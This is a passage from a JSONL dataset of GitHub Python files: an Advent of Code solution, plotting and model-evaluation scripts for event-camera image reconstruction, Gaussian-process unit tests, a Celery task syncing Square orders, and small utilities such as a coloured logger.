(PAPER,DRAW): PAPER,\n (PAPER,WIN): SCISSORS,\n (SCISSORS, LOSE):PAPER,\n (SCISSORS, DRAW): SCISSORS,\n (SCISSORS, WIN): ROCK}\nscoreTotal=0\nf = test.splitlines()\nf = open(\"day2.txt\")\nfor i in f:\n they,result = i.split()\n they=codeShapes[they]\n result = codeResult[result]\n we=desiredWe[(they,result)]\n scoreTotal+= scoreRound(they,we)\n\nprint(scoreTotal)","repo_name":"normanlorrain/2022_advent_of_code","sub_path":"day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"30094171916","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 25 16:54:24 2019\n\n@author: c3216945\n\"\"\"\nimport numpy as np, pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import (MultipleLocator, FormatStrFormatter,\n AutoMinorLocator)\nimport matplotlib.ticker as ticker\nimport glob\nimport natsort\n\nf = glob.glob('*.csv')\nf = natsort.realsorted(f)\n\ndef readData(filename):\n d = pd.read_csv(filename, header=0,usecols=[1,2])\n d = np.asarray(d)\n return d\n\nd1 = readData(f[0])\nd2 = readData(f[1])\nd3 = readData(f[2])\n\nymax = 0.0825\nR = 0.165*0.5\n\nsortedyz1 = d1[d1[:,1].argsort()]\nsortedyz2 = d2[d2[:,1].argsort()]\nsortedyz3 = 
d3[d3[:,1].argsort()]\n\nz1 = sortedyz1[:,1]\nz2 = sortedyz2[:,1]\nz3 = sortedyz3[:,1]\n\ny1 = sortedyz1[:,0]\ny2 = sortedyz2[:,0]\ny3 = sortedyz3[:,0]\n\nz1shift = (z1 - z1[0])\nz2shift = (z2 - z2[0])\nz3shift = (z3 - z3[0])\n\nz1shiftP = (z1-z1[0])/R\nz2shiftP = (z2-z2[0])/R\nz3shiftP = (z3-z3[0])/R\n\ndiffy1 = np.diff(y1)\ndiffz1 = np.diff(z1shift)\nslope1 = diffy1/diffz1\n\ndiffy2 = np.diff(y2)\ndiffz2 = np.diff(z2shift)\nslope2 = diffy2/diffz2\n\ndiffy3 = np.diff(y3)\ndiffz3 = np.diff(z3shift)\nslope3 = diffy3/diffz3\n\nparams = {\n 'axes.labelsize': 11,\n 'font.family': 'Arial',\n 'legend.fontsize': 11,\n 'xtick.labelsize': 11,\n 'ytick.labelsize': 11,\n 'figure.figsize': [4.3, 1.5]\n# 'figure.dpi': 300 \n }\nplt.rcParams.update(params)\nfig,ax = plt.subplots()\nfig.subplots_adjust(left=0.12, bottom=.3 , right=0.97, top=0.96)\n\nax.plot(z1shiftP[1:], np.abs(slope1), lw=1,ls='-',label='$Ca_{TP}=0.0024, Re_{TP}=52$')\nax.plot(z2shiftP[1:], np.abs(slope2),lw=1,ls='--',label='$Ca_{TP}=0.0055, Re_{TP}=121$')\nax.plot(z3shiftP[1:], np.abs(slope3),lw=1,ls='-.',label='$Ca_{TP}=0.0163, Re_{TP}=355$')\n\n#ax.axhline(ymax,c='k',lw=1,ls='--')\n#ax.axhline(0,c='k',lw=1,ls='--')\n\n#---------------------------axis control------------------------#\n\nax.set_ylabel(\"|dy'/dz'|\")\nax.set_xlabel(\"$z'/L_B$\")\n#\nax.set_ylim(-0.1,2)\nax.set_xlim(0,1)\n\nmajorLocatorX = MultipleLocator(1)\nmajorLocatorY = MultipleLocator(0.5)\nminorLocatorX = MultipleLocator(0.2)\nminorLocatorY = MultipleLocator(0.1)\n##ax.yaxis.set_major_formatter(ticker.FormatStrFormatter('%2.1f'))\n#\nax.xaxis.set_major_locator(majorLocatorX)\nax.xaxis.set_minor_locator(minorLocatorX)\nax.yaxis.set_minor_locator(minorLocatorY)\nax.yaxis.set_major_locator(majorLocatorY)\n#ax.xaxis.set_ticks(np.arange(0, 0.026, 0.005))\n#fig.text(0.15,0.82,'(a)',weight=\"bold\",fontsize=15)\n\n#------------------------legend control------------------------#\n#ax.legend(loc='center left', bbox_to_anchor=(1, 0.7))\n#ax.legend(loc=0,frameon=False,labelspacing=0.1)\n#ax.legend(loc='center left',frameon=False,bbox_to_anchor=(0.2, -0.25))\n#ax.legend(loc='center left', bbox_to_anchor=(1.01, 0.7),frameon=False,labelspacing=0.1)\n#fig.text(0.2,0.9,'(b)',weight=\"bold\",fontsize=15)\n\n#-----------------------add text------------------------------#\n\n#bbox_args = dict(boxstyle=\"round\", fc=\"0.8\")\n#arrow_args = dict(arrowstyle=\"->\")\n#ax.annotate('1', xy=(-0.9,0.8 ), xycoords='data', size=11,\n# xytext=(20, 20), textcoords='offset points',\n# ha=\"left\", va=\"bottom\",\n## bbox=bbox_args,\n# arrowprops=arrow_args)\n#\n#ax.annotate('2', xy=(-0.92,0.5), xycoords='data', size=11,\n# xytext=(30, 10), textcoords='offset points',\n# ha=\"left\", va=\"bottom\",\n## bbox=bbox_args,\n# arrowprops=arrow_args)\n##\n#ax.annotate('3', xy=(-0.95, 0.3), xycoords='data', size=11,\n# xytext=(30, 5), textcoords='offset points',\n# ha=\"left\", va=\"bottom\",\n## bbox=bbox_args,\n# arrowprops=arrow_args)\n#\n##\n#ax.annotate('$U_{TP}$', xy=(-0.4,1), xycoords='data', size=11,\n# xytext=(-30, 0), textcoords='offset points',\n# ha=\"center\", va=\"center\",\n## bbox=bbox_args,\n# arrowprops=arrow_args)\n\n#----------------------output figure-------------------------#\n#plt.margins(0)\n#fig.tight_layout(pad=0)\n#ax.grid(color=\"0.95\", linestyle='-', linewidth=1)\nfig.savefig('slope.tiff', dpi = 
300)\nplt.show()","repo_name":"linhanGE/myPythonCode","sub_path":"plotSlope.py","file_name":"plotSlope.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"57"} +{"seq_id":"2694079404","text":"import torch\nimport os\nimport json\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\nfrom dataset_utils import dataset_generator_from_bag\n\nfrom torchmetrics import (\n MeanSquaredError as MSE,\n StructuralSimilarityIndexMeasure as SSIM,\n)\nfrom torchmetrics.image.lpip import LearnedPerceptualImagePatchSimilarity as LPIPS\nfrom tqdm import tqdm\n\nfrom dataset_utils import get_dataset\nfrom models import get_model\n\n\ndef eval_model(\n model: torch.nn.Module,\n dataloader: torch.utils.data.DataLoader,\n output_folder: str,\n disable_progress=False,\n):\n\n # Predict and save images\n if not os.path.exists(output_folder):\n os.makedirs(output_folder)\n\n mse = MSE()\n ssim = SSIM(data_range=1)\n lpips = LPIPS(net_type=\"vgg\", normalize=True)\n\n i = 0\n for batch in tqdm(dataloader, disable=disable_progress):\n events, imgs = batch\n\n # Compute results\n model.eval()\n with torch.no_grad():\n out = model.predict_images(batch)\n\n # Compute metrics\n imgs = imgs.permute(0, 3, 1, 2)\n greyscale_imgs = imgs.shape[1] == 1\n mse(out, imgs)\n ssim(out, imgs)\n if greyscale_imgs: # greyscale images\n out_rgb = torch.repeat_interleave(out, 3, 1)\n imgs_rgb = torch.repeat_interleave(imgs, 3, 1)\n lpips(out_rgb, imgs_rgb)\n else:\n lpips(out, imgs)\n\n # Save images and ground truths\n for j in range(len(out)):\n pred_img = out[j].permute(1, 2, 0).squeeze().detach().cpu().numpy()\n gt_img = imgs[j].permute(1, 2, 0).squeeze().detach().cpu().numpy()\n cmap = \"gray\" if greyscale_imgs else None\n filename = f\"{i:04}_pred.png\"\n plt.imsave(os.path.join(output_folder, filename), pred_img, cmap=cmap)\n filename = f\"{i:04}_gt.png\"\n plt.imsave(os.path.join(output_folder, filename), gt_img, cmap=cmap)\n i += 1\n\n # Save metrics\n metrics = {\n \"MSE\": mse.compute().item(),\n \"SSIM\": ssim.compute().item(),\n \"LPIPS\": lpips.compute().item(),\n }\n with open(os.path.join(output_folder, \"metrics.json\"), \"w\", encoding=\"utf8\") as fp:\n json.dump(metrics, fp)\n\n\ndef eval_VisionTransformerConv(\n results_path, checkpoint_path, dataloader, reconstruct_colors=False\n):\n from models.transformer import VisionTransformerConv, predict_color_images\n\n model = VisionTransformerConv.load_from_checkpoint(\n checkpoint_path,\n feature_loss_weight=None,\n image_loss_weight=None,\n map_location=\"cuda\",\n )\n\n path_split = checkpoint_path.split(os.sep)\n RUN_NAME = path_split[path_split.index(\"checkpoints\") - 1]\n suffix = \" - \" + (\"last\" if \"last.ckpt\" in checkpoint_path else \"best\")\n\n if reconstruct_colors:\n from types import MethodType\n\n model.predict_images = MethodType(predict_color_images, model)\n suffix = \" color \" + suffix\n\n output_folder = os.path.join(results_path, RUN_NAME + suffix)\n eval_model(model, dataloader, output_folder)\n\n\ndef eval_StudentK(results_path, checkpoint_path, dataloader):\n from models.teacher_student import StudentK\n\n teacher = get_model(\n {\n \"class_name\": \"Teacher\",\n \"teacher_path\": \"teacher-epoch=287-step=18144.ckpt\",\n \"MODEL_PARAMS\": {\"lr\": None},\n }\n )\n model = StudentK.load_from_checkpoint(\n checkpoint_path, teacher=teacher, map_location=\"cuda\"\n )\n\n path_split = checkpoint_path.split(os.sep)\n RUN_NAME = 
path_split[path_split.index(\"checkpoints\") - 1]\n\n output_folder = os.path.join(results_path, RUN_NAME)\n eval_model(model, dataloader, output_folder)\n\n\ndef prepare_dataset(\n base_dataset_path,\n dataset_name=\"DIV2K_5_FIX\",\n split=\"valid\",\n batch_size=16,\n crop_size=(128, 128),\n):\n dataset_params = {\n \"limit\": None,\n \"preload_to_RAM\": True,\n \"crop_size\": crop_size,\n \"events_normalization\": None,\n \"convert_to_bw\": False,\n }\n\n if \"BW\" in dataset_name.upper():\n dataset_params[\"convert_to_bw\"] = True\n\n dataloader_params = {\n \"batch_size\": batch_size,\n \"num_workers\": 0,\n \"pin_memory\": True,\n }\n\n dataset = get_dataset(\n base_dataset_path, dataset_name, dataset_params, splits=[split]\n )\n\n dataloader = torch.utils.data.DataLoader(\n dataset, shuffle=False, **dataloader_params\n )\n\n print(\"Loaded samples: {} \\t batches: {:<10}\".format(len(dataset), len(dataloader)))\n\n return dataset, dataloader\n\n\ndef eval_EventsVisualization(results_path, dataset, show_images=False):\n from media_utils import gen_visual_bayer_events\n\n i = 0\n for events, imgs in dataset:\n img = gen_visual_bayer_events(events)\n res_folder = os.path.join(results_path)\n if not os.path.exists(res_folder):\n os.mkdir(res_folder)\n out_path = os.path.join(res_folder, f\"{i:04}.png\")\n plt.imsave(out_path, img)\n if show_images:\n plt.imshow(img)\n plt.show()\n i += 1\n\n\ndef eval_CED(\n results_path,\n checkpoint_path,\n bag_paths,\n num_predictions,\n min_n_events,\n normalize_events=None,\n):\n from models.transformer import VisionTransformerConv\n from dataset import CustomDataset\n\n model = VisionTransformerConv.load_from_checkpoint(\n checkpoint_path,\n feature_loss_weight=None,\n image_loss_weight=None,\n map_location=\"cuda\",\n ).to(\"cuda\")\n\n print(\"Number of predictions: {}\".format(num_predictions))\n print(\"Minimum number of events: {}\".format(min_n_events))\n\n for bag_path in bag_paths:\n print(\"Processing bag:\", bag_path)\n\n test_gen = dataset_generator_from_bag(\n bag_path, n_temp_bins=10, min_n_events=min_n_events\n )\n\n dataset_name = os.path.basename(bag_path).replace(\".bag\", \"\")\n output_path = os.path.join(results_path, \"CED_Normalized\", dataset_name)\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n\n i = 0\n for events, img in test_gen:\n if normalize_events:\n events = CustomDataset._normalize_events(None, events, normalize_events)\n events = torch.from_numpy(events).to(\"cuda\").unsqueeze(0)\n img = torch.from_numpy(img.astype(np.float32)).to(\"cuda\").unsqueeze(0)\n out = model.predict_images((events, img))[0]\n out = out.detach().squeeze().cpu().permute(1, 2, 0).numpy()\n img = img.detach().squeeze().cpu().numpy().astype(np.uint8)\n plt.imsave(os.path.join(output_path, f\"{i:04}_pred.png\"), out)\n plt.imsave(os.path.join(output_path, f\"{i:04}_gt.png\"), img)\n i += 1\n\n if i == num_predictions:\n break\n\n\ndef retrieve_best_images(folder):\n from torchmetrics.image.lpip import LearnedPerceptualImagePatchSimilarity\n\n lpips = LearnedPerceptualImagePatchSimilarity(net_type=\"vgg\", normalize=True)\n\n scores = {}\n\n pred_img = gt_img = None\n for image_file in sorted(os.listdir(folder)):\n image_path = os.path.join(folder, image_file)\n\n if \"_pred\" in image_path:\n pred_img = plt.imread(image_path)[:, :, :3].transpose(2, 0, 1)\n elif \"_gt\" in image_path:\n gt_img = plt.imread(image_path)[:, :, :3].transpose(2, 0, 1)\n\n if pred_img is not None and gt_img is not None:\n lpips(\n 
torch.from_numpy(pred_img[None, :]), torch.from_numpy(gt_img[None, :])\n            )\n            scores[image_file] = lpips.compute().item()\n            lpips.reset()\n            pred_img = gt_img = None\n\n    return list(sorted(scores.items(), key=lambda x: x[1]))\n\n\nif __name__ == \"__main__\":\n    results_path = r\"..\\\06 - Results\"\n\n    # === DIV2K ===\n\n    base_dataset_path = r\"C:\\\datasets\"\n\n    valid_dataset, valid_dataloader = prepare_dataset(\n        base_dataset_path,\n        dataset_name=\"DIV2K_5_FIX_SMALL\",\n        split=\"valid\",\n        batch_size=16,\n    )\n\n    # Color VisionTransformerConv\n    paths = [\n        r\"E:\\\Cartelle Personali\\\Fabrizio\\\Universita\\\Magistrale\\\Tesi\\\Materiale da mostrare\\\12-05\\\lightning_logs\\\Large - 1 il, 1e-2 fl, bn relu, maxpool, polarity fix\\\checkpoints\\\epoch=175-step=11088.ckpt\",\n        r\"E:\\\Cartelle Personali\\\Fabrizio\\\Universita\\\Magistrale\\\Tesi\\\05 - Experiments\\\lightning_logs\\\Large - VisionTransformerConv final\\\checkpoints\\\epoch=499-last.ckpt\",\n    ]\n    for checkpoint_path in paths:\n        eval_VisionTransformerConv(results_path, checkpoint_path, valid_dataloader)\n    checkpoint_path = r\"E:\\\Cartelle Personali\\\Fabrizio\\\Universita\\\Magistrale\\\Tesi\\\05 - Experiments\\\lightning_logs_00\\\Large - ViTConv black and white\\\checkpoints\\\epoch=273-step=17262.ckpt\"\n\n    # Color black and white VisionTransformerConv\n    eval_VisionTransformerConv(\n        results_path, checkpoint_path, valid_dataloader, reconstruct_colors=True\n    )\n\n    # StudentK\n    checkpoint_path = r\"E:\\\Cartelle Personali\\\Fabrizio\\\Universita\\\Magistrale\\\Tesi\\\05 - Experiments\\\lightning_logs\\\Large - StudentK LeakyReLU PlateauLR\\\checkpoints\\\epoch=221-last.ckpt\"\n    eval_StudentK(results_path, checkpoint_path, valid_dataloader)\n\n    # Events visualization\n    eval_EventsVisualization(os.path.join(results_path, \"DIV2KEvents\"), valid_dataset)\n\n    # Black and white VisionTransformerConv\n    # It's at the end of the eval because it needs to load the bw dataset\n    valid_dataset, valid_dataloader = prepare_dataset(\n        base_dataset_path,\n        dataset_name=\"DIV2K_5_BW_FIX\",\n        split=\"valid\",\n        batch_size=16,\n    )\n    eval_VisionTransformerConv(results_path, checkpoint_path, valid_dataloader)\n\n    # === CED ===\n    # My Model on CED\n    checkpoint_path = r\"E:\\\Cartelle Personali\\\Fabrizio\\\Universita\\\Magistrale\\\Tesi\\\05 - Experiments\\\lightning_logs\\\Large - VisionTransformerConv final\\\checkpoints\\\epoch=499-last.ckpt\"\n\n    num_predictions = 5\n    min_n_events = int(346 * 260 * 0.35)\n    bag_paths = [\n        \"C:\\\datasets\\\CEDDataset\\\indoors_foosball_1.bag\",\n        \"C:\\\datasets\\\CEDDataset\\\indoors_very_dark_250ms.bag\",\n        \"C:\\\datasets\\\CEDDataset\\\people_static_dancing_multiple_3.bag\",\n        \"C:\\\datasets\\\CEDDataset\\\people_static_wave_counterclockwise.bag\",\n        \"C:\\\datasets\\\CEDDataset\\\simple_color_keyboard_2.bag\",\n        \"C:\\\datasets\\\CEDDataset\\\simple_jenga_destroy.bag\",\n        \"C:\\\datasets\\\CEDDataset\\\calib_low_density.bag\",\n        \"C:\\\datasets\\\CEDDataset\\\driving_country.bag\",\n        \"C:\\\datasets\\\CEDDataset\\\driving_tunnel_sun.bag\",\n    ]\n    eval_CED(\n        results_path,\n        checkpoint_path,\n        bag_paths,\n        num_predictions,\n        min_n_events,\n        normalize_events=\"z_score_non_zero\",\n    )\n\n    # E2VID on CED\n    # Generate zip files from bags\n    for rosbag_path in bag_paths:\n        out_folder = \"rpg_e2vid/data\"\n        os.system(\n            f\"python rpg_e2vid/scripts/extract_events_from_rosbag.py {rosbag_path} --output_folder={out_folder} --event_topic=/dvs/events\"\n        )\n\n    # Generate images from zipfiles\n    zip_paths = [\n        \"rpg_e2vid\\\data\\\indoors_foosball_1.zip\",\n        
\"rpg_e2vid\\data\\indoors_very_dark_250ms.zip\",\n \"rpg_e2vid\\data\\people_static_dancing_multiple_3.zip\",\n \"rpg_e2vid\\data\\people_static_wave_counterclockwise.zip\",\n \"rpg_e2vid\\data\\simple_color_keyboard_2.zip\",\n \"rpg_e2vid\\data\\simple_jenga_destroy.zip\",\n \"rpg_e2vid\\data\\calib_low_density.zip\",\n \"rpg_e2vid\\data\\driving_country.zip\",\n \"rpg_e2vid\\data\\driving_tunnel_sun.zip\",\n ]\n weights_path = r\"rpg_e2vid\\pretrained\\E2VID_lightweight.pth.tar\"\n for dataset_path in zip_paths:\n dataset_name = os.path.basename(dataset_path).replace(\".zip\", \"\")\n output_path = os.path.join(results_path, \"E2VID\", dataset_name)\n\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n\n os.system(\n rf'python rpg_e2vid\\run_reconstruction.py -c {weights_path} -i \"{dataset_path}\" --output_folder=\"{output_path}\" --color'\n )\n\n # Events visualization\n for bag_path in bag_paths:\n bag_name = os.path.basename(bag_path).replace(\".bag\", \"\")\n output_path = os.path.join(results_path, \"CEDEvents\", bag_name)\n\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n\n valid_dataset = test_gen = dataset_generator_from_bag(\n bag_path, n_temp_bins=10, min_n_events=min_n_events\n )\n eval_EventsVisualization(output_path, valid_dataset)\n","repo_name":"SkyLionx/evit","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":12595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"17974678196","text":"from PIL import Image, ImageDraw\n\n# Llegim l'entrada\nn = int(input())\n\n# Creem la imatge, amb la mida i el color de fons corresponents\nimg = Image.new('RGB', (3*n, 3*n), 'Beige')\ndib = ImageDraw.Draw(img)\n\n# Dibuixem el polígon, donant els vèrtexs en ordre\n# Vigileu amb no pintar píxels de més!\ndib.polygon([\n (n, 0),\n (2*n - 1, 0),\n (3*n - 1, n),\n (3*n - 1, 2*n - 1),\n (2*n - 1, 3*n - 1),\n (n, 3*n - 1),\n (0, 2*n - 1),\n (0, n)\n], 'Red')\n\n# Guardem la imatge\nimg.save('output.png')\n","repo_name":"oicatalana/solucions_oicat_2022","sub_path":"concurs_benvinguda/P06_G1.py","file_name":"P06_G1.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"ca","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"27241149852","text":"import subprocess\nimport urllib.parse\n\n\ndef parse_file(file_path):\n\n file_data = open(file_path).read().split('\\n')\n colums = []\n for line in file_data:\n if \"@Column\" in line:\n colums.append(line.split(\"\\\"\")[1])\n\n return colums\n\n\ndef parse_sql(file_path):\n file_data = open(file_path).read().replace('\\n', '')\n\n tables = {}\n\n tables_parse = file_data.split(\"CREATE TABLE\")\n for parse in tables_parse:\n stack_bracket = []\n temp_name = ''\n parse = parse\n index = 0\n while index0:\n if parse[index]==')':\n stack_bracket.pop()\n elif parse[index]=='(':\n stack_bracket.append(1)\n table_colums+=parse[index]\n index+=1\n\n colums_parse = table_colums.split(',')\n colums = []\n for i in colums_parse:\n\n for j in i.split(' '):\n if j!='':\n if j!=\"KEY\" and j!= \"PRIMARY\":\n colums.append(j)\n break\n\n\n\n #print(colums)\n tables[temp_name] = sorted(colums)\n return tables\n\n\n\n\n\n\n\n\npath = 'firewall-db/src/main/java/com/integralads/firewalldb/domain/entity/'\n\nsql_tables = parse_sql(\"db.sql\")\nprint(sql_tables)\nfor table in sql_tables:\n java_name = ''\n for i in table.split('_'):\n java_name+=i[0].upper()\n for j in i[1:]:\n java_name+=j.lower()\n 
print(java_name+\"->\")\n temp_schema = sorted(parse_file(path+java_name+'.java'))\n print(temp_schema)\n print(sql_tables[table])\n if temp_schema == sorted(sql_tables[table]):\n print(\"schema match\")\n else:\n print(\"schema dont match\")\n\n\n\n\n\n\n\n\n","repo_name":"tnimale-ias/My-test-code","sub_path":"firewall_db_update_poc.py","file_name":"firewall_db_update_poc.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"26732441260","text":"# test_mercer_gaussian_process.py\nimport unittest\nimport torch\nfrom ortho.basis_functions import (\n smooth_exponential_basis,\n smooth_exponential_eigenvalues,\n Basis,\n)\n\nfrom mercergp.kernels import MercerKernel\nfrom mercergp.MGP import MercerGP\n\n\nclass TestMercerGP(unittest.TestCase):\n def setUp(self):\n # basis parameters\n self.basis_function = smooth_exponential_basis\n self.dimension = 1\n self.order = 10\n\n # parameters\n l_se = torch.Tensor([[5]])\n sigma_se = torch.Tensor([1])\n prec = torch.Tensor([1])\n sigma_e = torch.Tensor([0.01])\n se_kernel_args = {\n \"ard_parameter\": l_se,\n \"variance_parameter\": sigma_se,\n \"noise_parameter\": sigma_e,\n \"precision_parameter\": prec,\n }\n\n self.params = se_kernel_args\n\n # basis function\n self.basis = Basis(\n self.basis_function, self.dimension, self.order, self.params\n )\n\n self.eigenvalues = smooth_exponential_eigenvalues(\n self.order, self.params\n )\n\n # gp perameters\n self.kernel = MercerKernel(\n self.order, self.basis, self.eigenvalues, self.params\n )\n\n self.mercer_gp = MercerGP(\n self.basis, self.order, self.dimension, self.kernel\n )\n return\n\n def test_adding_data(self):\n x = torch.Tensor([0.1, 4, 5.24, 7])\n x2 = torch.Tensor([2, 3, 4, 5])\n y = torch.Tensor([3, 4, 5, 6])\n y2 = torch.Tensor([9, 2, 7, 8])\n\n self.mercer_gp.add_data(x, y)\n self.mercer_gp.add_data(x2, y2)\n xs, ys = self.mercer_gp.get_inputs(), self.mercer_gp.get_outputs()\n\n self.assertTrue(\n (xs == torch.Tensor([0.1, 4, 5.24, 7, 2, 3, 4, 5])).all()\n )\n self.assertTrue((ys == torch.Tensor([3, 4, 5, 6, 9, 2, 7, 8])).all())\n\n def test_coefficients_shape_flat(self):\n # mercer_gp = MercerGP(\n # self.basis, self.eigenvalues, self.order, self.kernel\n # )\n test_inputs = torch.linspace(0, 1, 20)\n test_outputs = torch.linspace(0, 1, 20)\n\n self.mercer_gp.add_data(test_inputs, test_outputs)\n\n coefficients = self.mercer_gp._calculate_posterior_coefficients()\n self.assertEqual(coefficients.shape, torch.Size([self.order]))\n return\n\n def test_coefficients_shape_1d(self):\n test_inputs = torch.linspace(0, 1, 20).unsqueeze(1)\n test_outputs = torch.linspace(0, 1, 20).unsqueeze(1)\n\n self.mercer_gp.add_data(test_inputs, test_outputs)\n\n coefficients = self.mercer_gp._calculate_posterior_coefficients()\n self.assertEqual(coefficients.shape, torch.Size([self.order]))\n return\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"daveb-dev/mercergp","sub_path":"test/test_mercer_gaussian_processes.py","file_name":"test_mercer_gaussian_processes.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"57"} +{"seq_id":"7575084533","text":"# input\nk = int(input())\n\n# stack : pop if input is 0\nstack = []\nfor i in range(k):\n n = int(input())\n if n == 0 and stack:\n stack.pop()\n elif n != 0:\n stack.append(n)\n\n# print 
ans\nprint(sum(stack))\n","repo_name":"sangwonme/BOJ-sols","sub_path":"Q_10773.py","file_name":"Q_10773.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"12647536831","text":"import pandas as pd\nfrom datetime import datetime, timezone, timedelta\nfrom celery import shared_task\nfrom django.contrib.auth.models import User\n\nfrom core.analytics_utils import get_analytics, get_item_props\nfrom core.square_api_utils import get_locations, get_orders, parse_orders\n\nglobal NUMERIC_COLS\nNUMERIC_COLS = ['quantity', 'item_price', 'total_item_price', 'total_order_price']\n\n@shared_task\ndef sample_task():\n print(\"My task has run\")\n return None\n\n@shared_task\ndef update_user_info(\n user_pks: list = None,\n pull_data: bool = True,\n update_analytics: bool = True,\n years_to_update: list = None\n):\n '''\n 1. Data Extraction\n - Pull new transactions data from Square API\n - Update raw_data and parsed_data\n 2. Run Analytics\n - Update user's analytics based on parsed_data\n '''\n if user_pks == None:\n users = User.objects.all()\n else:\n users = User.objects.filter(pk__in=user_pks)\n\n for user in users:\n orders_df = user.data.read_parsed_data()\n orders_df['timestamp'] = pd.to_datetime(orders_df.timestamp, utc=True)\n items_df = user.data.read_parsed_data(field=\"menu_data\")\n raw_orders = user.data.read_raw_data()\n\n YEARS_TO_UPDATE = orders_df.timestamp.dt.year.unique()\n\n if user.data.source == 'Square' and pull_data == True:\n ## Run function to extract Square data\n print('extracting square data...')\n\n ACCESS_TOKEN = user.data.access_key\n locations = get_locations(ACCESS_TOKEN)\n loc_ids = [locs['id'] for locs in locations['locations']]\n start_time = (datetime.now(timezone.utc).astimezone() - timedelta(1.5)).isoformat()\n end_time = datetime.now(timezone.utc).astimezone().isoformat()\n orders = get_orders(start_time, end_time, loc_ids, ACCESS_TOKEN)\n new_orders_df = parse_orders(orders)\n\n ## Create new raw_orders list and remove duplicates\n ## Note that set() does not work because the list contains dicts, which are unhashable\n raw_orders = raw_orders + orders['orders']\n raw_orders = [i for n, i in enumerate(raw_orders) if i not in raw_orders[n + 1:]]\n user.data.save_raw_data(raw_orders)\n\n ## Create new orders_df and drop duplicates\n orders_df = pd.concat([orders_df, new_orders_df])\n orders_df[NUMERIC_COLS] = orders_df[NUMERIC_COLS].apply(pd.to_numeric)\n # Timestamp inconsistencies causes problems, and is thus excluded.\n orders_df.drop_duplicates(subset=['order_id', 'item_name']+NUMERIC_COLS, inplace=True)\n orders_df.to_csv('maxi_error.csv',index=False)\n user.data.save_parsed_data(orders_df)\n print(len(orders_df))\n\n YEARS_TO_UPDATE = new_orders_df.timestamp.dt.year.unique()\n print('square data extracted')\n\n if update_analytics == True:\n orders_df['timestamp'] = pd.to_datetime(orders_df.timestamp, utc=True)\n\n if years_to_update != None:\n YEARS_TO_UPDATE = years_to_update\n for year in YEARS_TO_UPDATE:\n print('updating for {}'.format(year))\n period_df = orders_df[orders_df.timestamp.dt.year == year].copy()\n analytics = user.analytics.get(start_date=datetime(year,1,1))\n\n new_analytics_data = get_analytics(period_df)\n new_analytics_data['items'] = get_item_props(period_df, items_df)\n\n analytics.data = new_analytics_data\n analytics.save()\n\n return 
None\n","repo_name":"michaelchen-lab/menucarlo-backend","sub_path":"core/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":3630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"72540624498","text":"# --------------------------\n# UFSC - CTC - INE - INE5603\n# Exercício Processa Números\n# --------------------------\n# Classe responsável por obter os números pares.\n\nfrom view.paineis.painel_abstrato import PainelAbstrato\nfrom model.processa_numeros import pares as encontra_pares\n\nclass PainelPares(PainelAbstrato):\n def __init__(self):\n super().__init__('Pares')\n\n def interaja(self):\n numeros = self._leiaints()\n pares = encontra_pares(numeros)\n msg = 'A lista {} contém os seguintes números pares: {}'.format(numeros, pares)\n print(msg)\n","repo_name":"ine5603-tarefas/ine5603-tarefas-20202","sub_path":"lista-02/processa-numeros/view/paineis/painel_pares.py","file_name":"painel_pares.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"pt","doc_type":"code","stars":3,"dataset":"github-code","pt":"57"} +{"seq_id":"21439191135","text":"from common.globals import DEBUG, LOGS_PATH\nfrom sys import stdout\nimport logging.handlers\nimport logging\n\nif DEBUG:\n LOG_PATH = LOGS_PATH / 'development'\n LOG_LEVEL = logging.INFO\nelse:\n LOG_PATH = LOGS_PATH / 'production'\n LOG_LEVEL = logging.WARNING\n\nclass CLogger(logging.Logger):\n\n def __init__(self, PATH = LOG_PATH, LOGLEVEL = LOG_LEVEL, name='CBOT'):\n super().__init__(name)\n self.setLevel(LOGLEVEL)\n \n FileHandler = logging.handlers.RotatingFileHandler(\n filename= PATH / 'discord.log',\n encoding='utf-8',\n maxBytes=32 * 1024 * 1024, # 32 MiB\n backupCount=5, # Rotate through 5 files\n )\n ConsoleHandler=logging.StreamHandler(stdout)\n ConsoleHandler.setFormatter(_ColourFormatter())\n self.addHandler(ConsoleHandler)\n self.addHandler(FileHandler)\n\nclass _ColourFormatter(logging.Formatter):\n\n LEVEL_COLOURS = [\n (logging.DEBUG, '\\x1b[40;1m'),\n (logging.INFO, '\\x1b[34;1m'),\n (logging.WARNING, '\\x1b[33;1m'),\n (logging.ERROR, '\\x1b[31m'),\n (logging.CRITICAL, '\\x1b[41m'),\n ]\n\n FORMATS = {\n level: logging.Formatter(\n f'\\x1b[30;1m%(asctime)s\\x1b[0m {colour}%(levelname)-8s\\x1b[0m \\x1b[35m%(name)s\\x1b[0m %(message)s',\n '%Y-%m-%d %H:%M:%S',\n )\n for level, colour in LEVEL_COLOURS\n }\n\n def format(self, record):\n formatter = self.FORMATS.get(record.levelno)\n if formatter is None:\n formatter = self.FORMATS[logging.DEBUG]\n\n # Override the traceback to always print in red\n if record.exc_info:\n text = formatter.formatException(record.exc_info)\n record.exc_text = f'\\x1b[31m{text}\\x1b[0m'\n\n output = formatter.format(record)\n\n # 